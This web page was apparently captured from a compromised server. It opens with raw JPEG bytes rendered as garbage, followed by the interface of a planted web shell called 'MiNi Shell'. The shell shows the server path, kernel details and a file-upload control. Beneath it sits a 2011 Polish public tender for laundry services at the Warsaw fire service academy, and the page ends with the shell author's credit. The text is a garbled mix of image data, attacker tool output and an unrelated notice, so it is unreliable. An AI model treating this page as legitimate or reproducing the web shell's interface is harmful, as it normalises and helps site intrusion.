JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111121/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20111121/389018-N-2011.html

<p class="kh_header"><b>Warszawa: Świadczenie usług pralniczych dla Szkoły Głównej Służby Pożarniczej w Warszawie</b><br>
<b>Numer ogłoszenia: 389018 - 2011; data zamieszczenia: 21.11.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Szkoła Główna Służby Pożarniczej , ul. Słowackiego 52/54, 01-629 Warszawa, woj. mazowieckie, tel. 022 5617624, faks 022 8330724.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.sgsp.edu.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Uczelnia publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usług pralniczych dla Szkoły Głównej Służby Pożarniczej w Warszawie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Kompleksowa usługa pralnicza:
- prania wodnego, 
- prania wodnego z dezynsekcją (pościeli płaskiej, kocy, śpiworów),
- czyszczenia chemicznego (asortymentu nie nadającego się do prania wodnego),
- suszenia, 
- prasowania,
- maglowania pościeli,
- dezynfekcji (np. ubrań specjalnych po akcjach ratowniczych)
wg właściwości nw. asortymentu wraz z usługą transportową z i do siedziby Zamawiającego:

O metodzie prania decyduje metka znajdująca się na asortymencie, a w przypadku jej braku uzgodnienie pomiędzy stronami. W przypadku dezynfekcji ubrań po akcjach ratowniczo - gaśniczych Zamawiający poinformuje Wykonawcę o takiej konieczności. 

Asortyment wchodzący w zakres przedmiotu zamówienia/ przewidywana ilość w okresie 24 m-cy:
1. Bielizna płaska  (prześcieradła, poszwy, poszewki, ręczniki frotte) - 6000 kg                   
2. Bielizna gastronomiczna (obrusy, ścierki, serwetki) - 1200 kg
3. Odzież gastronomiczna (spodnie kucharskie, bluzy kucharskie, spódnice kucharskie) - 900 szt.
4. Fartuchy białe (gastronomia) - 700 szt.                          
5. Firanki i zasłony - 2400 m2
6. Sukno konferencyjne - 200 m2
7. Ubrania specjalne (strażackie - kurtka + spodnie) - 280 kpl.
8. Ubrania koszarowe (4 częściowe: bluza, spodnie, kamizelka, czapka dżokejka) - 200 kpl.
9. Sztormiaki - 200 szt.
10. Mundury męskie i damskie - 540 kpl.
11. Śpiwory - 800 szt.
12. Materace (ok. 80x200 mm) - 140 szt.
13. Worki marynarskie - 140 szt.
14. Koce wełniane/akrylowe - 1000 szt.
15. Flagi - 100 szt.
16. Vertikale - 700 m2
Realizacja przedmiotu zamówienia:
1. Odbiór brudnego asortymentu ze szkoły Głównej Służby Pożarniczej  z siedzibą w Warszawie przy ul. Słowackiego 52/54 - jeden raz w tygodniu w uzgodnieniu z przedstawicielem Zamawiającego. 
2. Odbiór brudnego asortymentyu z Ośrodka Szkoleniowego z siedzibą w Wesołej/            Starej Miłosnej przy ul. Topolowej 2 - jeden raz w tygodniu po uzgodnieniu z przedstawicielem Zamawiającego. 
3. Czysty asortyment będzie dostarczany do Szkoły Głównej Służby Pożarniczej z siedzibą w Warszawie przy ul. Słowackiego 52/54 lub Ośrodka Szkoleniowego z siedzibą w Starej Miłosnej przy   ul. Topolowej 2  - w terminie do 5 dni roboczych od pobrania przez Wykonawcę brudnego asortymentu. 
4. W przypadkach awaryjnych:   
      - odbiór musi nastąpić maksymalnie:
1) w przeciągu 12 godzin, jeżeli zgłoszenie przez Zamawiającego odbędzie się po godz. 12.00 
2) do godz. 15.00 tego samego dnia co zgłoszenie Zamawiającego, w przypadku zgłoszenia do godz. 10.00.

- wykonanie usługi musi nastąpić maksymalnie w przeciągu 12 od odbioru przez Wykonawcę brudnego asortymentu.
5. Bielizna czysta będzie dostarczana z pralni Wykonawcy poskładana i zapakowana asortymentowo w worki po 10 szt. 
      Pościel nie nadająca się do dalszego użytkowania (zużyta) z winy Zamawiającego,           musi zostać zapakowana osobno. 
6. Wykonawca odpowiada za powierzony asortyment przez Zamawiającego od momentu odebrania go z magazynu Zamawiającego, do czasu przekazania go czystego do magazynu Zamawiającego.  Wszelkie szkody powstałe na skutek świadczonej usługi   Wykonawca jest zobowiązany usunąć, a w razie potrzeby pokryć powstałe koszty.
7. Reklamacja będzie rozstrzygana przez Wykonawcę w czasie 24 godzin od momentu zgłoszenia dokonanego na piśmie (fax) przez Zamawiającego.
8. Wykonawca usługi jest zobowiązany do potwierdzenia odbioru brudnego asortymentu (dokument zapewni Wykonawca) wykazującym rodzaj i ilości oddanego asortymentu. Dokument potwierdza własnoręcznym podpisem przedstawiciel Zamawiającego oraz osoba upoważniona ze strony Wykonawcy.
9. Rozliczenie za wykonanie usługi dokonywane będzie na podstawie faktur zbiorczych wystawionych na koniec miesiąca, po wykonaniu przez Wykonawcę usługi bez zastrzeżeń, co zostanie  potwierdzone na podstawie odbioru sporządzonego na zestawieniach potwierdzonych przez przedstawiciela Zamawiającego i Wykonawcy..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Dopuszcza się udzielenie zamówień uzupełniajacych Wykonawcy zamówienia podstawowego w trybie art. 67 ust. 1 pkt. 6 Ustawy Prawo zamówień publicznych, ilościowo i rodzajowo w granicach tej samej grupy CPV nie przekraczających 20% wartości zamówienia podstawowego według cen uzgodnionych z Wykonawcą.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 98.31.00.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1) Wykonawca przystępujący do przetargu jest obowiązany wnieść wadium w wysokości:

2 500, 00 PLN brutto (słownie: dwa tysiące pięćset złotych),

2). Wadium może być wniesione w następujących formach:
- pieniądzu, na rachunek bankowy nr 08102010260000120200877860 w PKO BP 
- poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
- gwarancjach bankowych,
- gwarancjach ubezpieczeniowych,
- poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy 
z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości.

3). Wadium wnoszone w formie: poręczenia bankowego, gwarancji bankowych lub gwarancji ubezpieczeniowych należy złożyć w oryginale w siedzibie Zamawiającego w Kancelarii Ogólnej - pok. nr 102.

4). Wadium musi być wniesione najpóźniej do dnia 30 listopada 2011 r., do godz. 1000, tj. przed upływem terminu składania ofert, co musi zostać udokumentowane stosownym załącznikiem do oferty.
5). Wadium wniesione w terminie późniejszym niż określony w pkt. 4. zostanie uznane za wniesione po terminie i skutkować będzie wykluczeniem Wykonawcy z postępowania.
6) Dyspozycja w zakresie zwrotu wadium określona została w art. 46 Ustawy Pzp.
7) Wykonawca, który nie wniesie wadium na zasadach określonych w SIWZ zostanie wykluczony z postępowania.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie spełniania warunków, o których mowa w pkt. 3.1 zamawiający żąda od wykonawców w trybie art. 44 Pzp, załączenia do oferty
 
a) Oświadczenia, którego treść stanowi załącznik nr 3 do SIWZ, 
b) Stosowny do właściwości podmiotowej wykonawców dokument potwierdzający charakter prowadzonej działalności  uprawniającej do prowadzenia przedmiotowych usług, np. KRS lub wypis z ewidencji działalności gospodarczej - wystawiony nie wcześniej niż 6 miesięcy przed  upływem terminu składania ofert.
c) Kopię ostatniego protokołu pokontrolnego SANEPIDU - pozytywną opinię (do dokumentu należy dołączyć oświadczenie - dokument własny Wykonawcy, iż dane zawarte w niniejszym dokumencie są aktualne na dzień złożenia oferty).

2). Dla spełniania w/w warunków wykonawcy mogą korzystać z zasobów innych podmiotów na warunkach określonych w art. 26 ust. 2b Pzp odpowiednio to udowadniając.
3). Zamawiający dokonując oceny spełniania warunków przez wykonawców na podstawie otrzymanych dokumentów/oświadczeń, wykorzystuje odpowiednio procedurę uzupełniania i wyjaśnień określoną w art. 26 ust. 3 i 4 Pzp. Ostateczna ocena sprowadza się do stwierdzenia spełnia - nie spełnia.
4). Nie wykazanie przez wykonawców spełnienia warunków udziału w postępowaniu podlega wykluczeniu wykonawcy w trybie art. 24 ust.2 pkt. 4 Pzp.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie spełniania warunków, o których mowa w pkt. 3.2 zamawiający żąda od wykonawców w trybie art. 44 Pzp, załączenia do oferty
 
a) Oświadczenia, którego treść stanowi załącznik nr 3 do SIWZ, 

2). Dla spełniania w/w warunków wykonawcy mogą korzystać z zasobów innych podmiotów na warunkach określonych w art. 26 ust. 2b Pzp odpowiednio to udowadniając.
3). Zamawiający dokonując oceny spełniania warunków przez wykonawców na podstawie otrzymanych dokumentów/oświadczeń, wykorzystuje odpowiednio procedurę uzupełniania i wyjaśnień określoną w art. 26 ust. 3 i 4 Pzp. Ostateczna ocena sprowadza się do stwierdzenia spełnia - nie spełnia.
4). Nie wykazanie przez wykonawców spełnienia warunków udziału w postępowaniu podlega wykluczeniu wykonawcy w trybie art. 24 ust.2 pkt. 4 Pzp.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie spełniania warunków, o których mowa w pkt. 3.3 zamawiający żąda od wykonawców w trybie art. 44 Pzp, załączenia do oferty
 
a) Oświadczenia, którego treść stanowi załącznik nr 3 do SIWZ, 
b) Wykaz środków pralniczych i dezynfekujących jakich Wykonawca zamierza używać do prania wraz z odpowiednimi świadectwami dopuszczenia do ich stosowania.

2). Dla spełniania w/w warunków wykonawcy mogą korzystać z zasobów innych podmiotów na warunkach określonych w art. 26 ust. 2b Pzp odpowiednio to udowadniając.
3). Zamawiający dokonując oceny spełniania warunków przez wykonawców na podstawie otrzymanych dokumentów/oświadczeń, wykorzystuje odpowiednio procedurę uzupełniania i wyjaśnień określoną w art. 26 ust. 3 i 4 Pzp. Ostateczna ocena sprowadza się do stwierdzenia spełnia - nie spełnia.
4). Nie wykazanie przez wykonawców spełnienia warunków udziału w postępowaniu podlega wykluczeniu wykonawcy w trybie art. 24 ust.2 pkt. 4 Pzp.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie spełniania warunków, o których mowa w pkt. 3.4 zamawiający żąda od wykonawców w trybie art. 44 Pzp, załączenia do oferty
 
a) Oświadczenia, którego treść stanowi załącznik nr 3 do SIWZ. 
2). Dla spełniania w/w warunków wykonawcy mogą korzystać z zasobów innych podmiotów na warunkach określonych w art. 26 ust. 2b Pzp odpowiednio to udowadniając.
3). Zamawiający dokonując oceny spełniania warunków przez wykonawców na podstawie otrzymanych dokumentów/oświadczeń, wykorzystuje odpowiednio procedurę uzupełniania i wyjaśnień określoną w art. 26 ust. 3 i 4 Pzp. Ostateczna ocena sprowadza się do stwierdzenia spełnia - nie spełnia.
4). Nie wykazanie przez wykonawców spełnienia warunków udziału w postępowaniu podlega wykluczeniu wykonawcy w trybie art. 24 ust.2 pkt. 4 Pzp.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie spełniania warunków, o których mowa w pkt. 3.5 zamawiający żąda od wykonawców w trybie art. 44 Pzp, załączenia do oferty
 
a) Oświadczenia, którego treść stanowi załącznik nr 3 do SIWZ. 
2). Dla spełniania w/w warunków wykonawcy mogą korzystać z zasobów innych podmiotów na warunkach określonych w art. 26 ust. 2b Pzp odpowiednio to udowadniając.
3). Zamawiający dokonując oceny spełniania warunków przez wykonawców na podstawie otrzymanych dokumentów/oświadczeń, wykorzystuje odpowiednio procedurę uzupełniania i wyjaśnień określoną w art. 26 ust. 3 i 4 Pzp. Ostateczna ocena sprowadza się do stwierdzenia spełnia - nie spełnia.
4). Nie wykazanie przez wykonawców spełnienia warunków udziału w postępowaniu podlega wykluczeniu wykonawcy w trybie art. 24 ust.2 pkt. 4 Pzp.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Formularz cenowy  - zał. 2 do SIWZ
2. Dowód wniesienia wadium przed upływem terminu składania ofert.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Korekta ceny ofertowej w przypadku ustawowej zmiany stawki podatku VAT.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.sgsp.edu.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Siedziba Zamawiającego - Warszawa ul. Słowackiego 52/54 - Dział Zamówień Publicznych pokój 323 OBIEKT 02 - wejście od ul. Siemiradzkiego..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.11.2011 godzina 10:00, miejsce: KANCELARIA OGÓLNA pok. 102 - wejście od ul. Siemiradzkiego 2 (obiekt 02). 
Godziny pracy Kancelarii od poniedziałku do piątku w godzinach od 815  do 1400..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com